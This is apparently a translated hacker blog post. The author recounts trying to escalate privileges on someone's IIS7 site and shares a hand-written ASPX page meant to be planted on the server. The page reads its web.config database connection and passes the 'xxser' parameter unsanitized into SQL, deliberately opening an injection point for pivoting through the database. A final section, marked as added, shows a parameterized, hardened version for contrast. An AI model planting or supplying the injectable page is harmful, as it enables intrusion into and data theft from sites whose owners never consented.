Yesterday 4z1 and I looked at a site. Privilege escalation was very hard; we spent a full 5 hours on it with no result. 2008 + IIS7, no sa, no root, no services of any kind...
In the process we used an aspx page that constructs an injection to pivot across the site. I found a pile of code online and not one piece of it worked.
It is not much code, so I just wrote one myself. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    <script language="c#" runat="server">
        void Page_Init(object sender, EventArgs e)
        {
            // The connection string is read from web.config; "连接名" is the placeholder for its name.
            System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
            conn.Open();

            string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1

            // Deliberately concatenated: whatever arrives in xxser becomes part of the SQL text.
            // "表" and "列名" are placeholders for the table and column.
            System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
            int x = command.ExecuteNonQuery(); // returns -1 for a SELECT
            Response.Write(i + "\n");
            Response.Write(x);
            conn.Close();
        }
    </script>
    </div>
    </form>
</body>
</html>
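For contrast, the same handler rewritten so that the query is no longer injectable: the SQL text is fixed, the value from xxser travels as a typed parameter, and non-integer input is rejected instead of echoed. This is an added example, not code from the original post; the connection name "AppDb", table [Orders] and column [Id] are assumed placeholders.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<script runat="server">
    // Hardened counterpart of the page above (added example).
    // Placeholders: connection name "AppDb", table [Orders], column [Id].
    void Page_Init(object sender, EventArgs e)
    {
        // Step 1: validate the input type before it goes anywhere near the database.
        int id;
        string raw = Request.QueryString["xxser"];
        if (!int.TryParse(raw, out id))
        {
            // Reject without reflecting the raw value into the response.
            Response.StatusCode = 400;
            Response.End();
            return;
        }

        // Step 2: fixed query text plus a typed parameter; the database receives
        // the integer value, never SQL text built from the request.
        string cs = ConfigurationManager.ConnectionStrings["AppDb"].ConnectionString;
        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand("SELECT COUNT(*) FROM [Orders] WHERE [Id] = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            int count = (int)cmd.ExecuteScalar(); // ExecuteScalar returns the count, unlike ExecuteNonQuery
            Response.Write(count);
        }
    }
</script>
```

The same pattern applies to string columns by switching the parameter type to SqlDbType.NVarChar with an explicit length; the connection string should also point at a least-privilege database login rather than sa.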